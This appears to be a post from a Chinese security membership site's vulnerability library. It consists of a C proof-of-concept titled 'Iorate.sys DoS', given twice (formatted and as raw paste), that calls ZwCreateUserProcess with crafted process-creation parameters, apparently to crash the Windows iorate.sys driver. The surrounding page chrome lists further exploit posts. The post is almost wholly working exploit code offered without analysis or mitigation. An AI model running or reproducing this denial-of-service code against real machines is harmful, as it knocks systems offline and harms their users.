Iorate.sys_DoS

090

# Iorate.sys DoS
==POC==

struct _PS_CREATE_INFO
{
    ulonglong Size;
    ulonglong State;//at 0x8
    ulong InitFlags;//at 0x10
    ulong AdditionalFileAccess;//at 0x14
    ulonglong X0;
    ulonglong X1;
    ulonglong X2;
    ulonglong X3;
    ulonglong X4;
    ulonglong X5;
    ulonglong X6;
    ulonglong X7;
};
 
 
void IoRateDoS()
{
    //--------- Parameters Start Here ----------
    HANDLE hNewProcess = 0;
    HANDLE hNewThread = 0;
    ulonglong ProcessDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
    ulonglong ThreadDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
    _OBJECT_ATTRIBUTES ObjAttr_p = {sizeof(ObjAttr_p)};
    _OBJECT_ATTRIBUTES ObjAttr_t  = {sizeof(ObjAttr_t)};
    ulonglong ProcessFlagsX = 0x1000;
    ulonglong ThreadFlagsX = 0;
    ulonglong ProcessParametersX =  0;
    _PS_CREATE_INFO PsCreateInfo = {sizeof(PsCreateInfo)};
        PsCreateInfo.InitFlags = PsCreateInitialState;
        PsCreateInfo.AdditionalFileAccess = FILE_EXECUTE;
    ulonglong AttributeListX =  0;
    //---------------
    ulonglong ret = ZwCreateUserProcess(&hNewProcess,&hNewThread,
                        ProcessDesiredAccessX,  ThreadDesiredAccessX,
                        &ObjAttr_p, &ObjAttr_t,
                        ProcessFlagsX,  ThreadFlagsX,
                        (void*)ProcessParametersX,
                        &PsCreateInfo,
                        (void*)AttributeListX);
    printf("ZwCreateUserProcess, ret: %I64X\r\n",ret);
}

==RAW Paste Data ==

struct _PS_CREATE_INFO
{
	ulonglong Size;
	ulonglong State;//at 0x8
	ulong InitFlags;//at 0x10
	ulong AdditionalFileAccess;//at 0x14
	ulonglong X0;
	ulonglong X1;
	ulonglong X2;
	ulonglong X3;
	ulonglong X4;
	ulonglong X5;
	ulonglong X6;
	ulonglong X7;
};


void IoRateDoS()
{
	//--------- Parameters Start Here ----------
	HANDLE hNewProcess = 0;
	HANDLE hNewThread = 0;
	ulonglong ProcessDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
	ulonglong ThreadDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
	_OBJECT_ATTRIBUTES ObjAttr_p = {sizeof(ObjAttr_p)};
	_OBJECT_ATTRIBUTES ObjAttr_t  = {sizeof(ObjAttr_t)};
	ulonglong ProcessFlagsX = 0x1000;
	ulonglong ThreadFlagsX = 0;
	ulonglong ProcessParametersX =  0;
	_PS_CREATE_INFO PsCreateInfo = {sizeof(PsCreateInfo)};
		PsCreateInfo.InitFlags = PsCreateInitialState;
		PsCreateInfo.AdditionalFileAccess = FILE_EXECUTE;
	ulonglong AttributeListX =  0;
	//---------------
	ulonglong ret = ZwCreateUserProcess(&hNewProcess,&hNewThread,
						ProcessDesiredAccessX,	ThreadDesiredAccessX,
						&ObjAttr_p,	&ObjAttr_t,
						ProcessFlagsX,	ThreadFlagsX,
						(void*)ProcessParametersX,
						&PsCreateInfo,
						(void*)AttributeListX);
	printf("ZwCreateUserProcess, ret: %I64X\r\n",ret);
}
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
喜欢就支持一下吧
点赞0赞赏 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(1.8.5版本 25.11.12更新)-棉花糖会员站
会员必看手册(1.8.5版本 25.11.12更新)
会员必看手册(1.8.5版本 25.11.12更新)
2025年11月1日 3.5W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.4W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8477
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 5975
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4532
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3636
相关推荐
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 5975
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2349
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2250
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 1918
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1726
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
2025年7月4日 1655
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
上海市重要网络和信息系统密码应用与安全性评估工作指南(2024版)
西软云XMS download 存在任意文件读取
智联云采 SRM2.0 restore 存在远程命令执行
泛微e-office userselectNew存在信息泄漏
泛微e-office json_common.php存在sql注入
泛微e-office config_2.php 未授权
最近一周热门文章

1APK/IPA/HAP 移动应用安全分析器

xiaobai_99的头像-棉花糖会员站年费会员2025年11月10日
年费会员会员专属1312

2泛微e-office userselectNew存在信息泄漏

棉花糖的头像-棉花糖会员站年费会员2025年11月13日
9999711

3金和OA_C6 ExamineNodSingletonXml存在XXE

棉花糖的头像-棉花糖会员站年费会员2025年11月10日
9999709

4无镜.lab Docker Registry 未授权练习

xiaowu的头像-棉花糖会员站年费会员2025年11月10日
707

5无境靶场:州弟学安全:三层综合渗透

Scarecrow的头像-棉花糖会员站年费会员2025年11月12日
690

6州弟学安全:三层综合渗透记录-Redbag

Redbag的头像-棉花糖会员站年费会员2025年11月14日
685
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密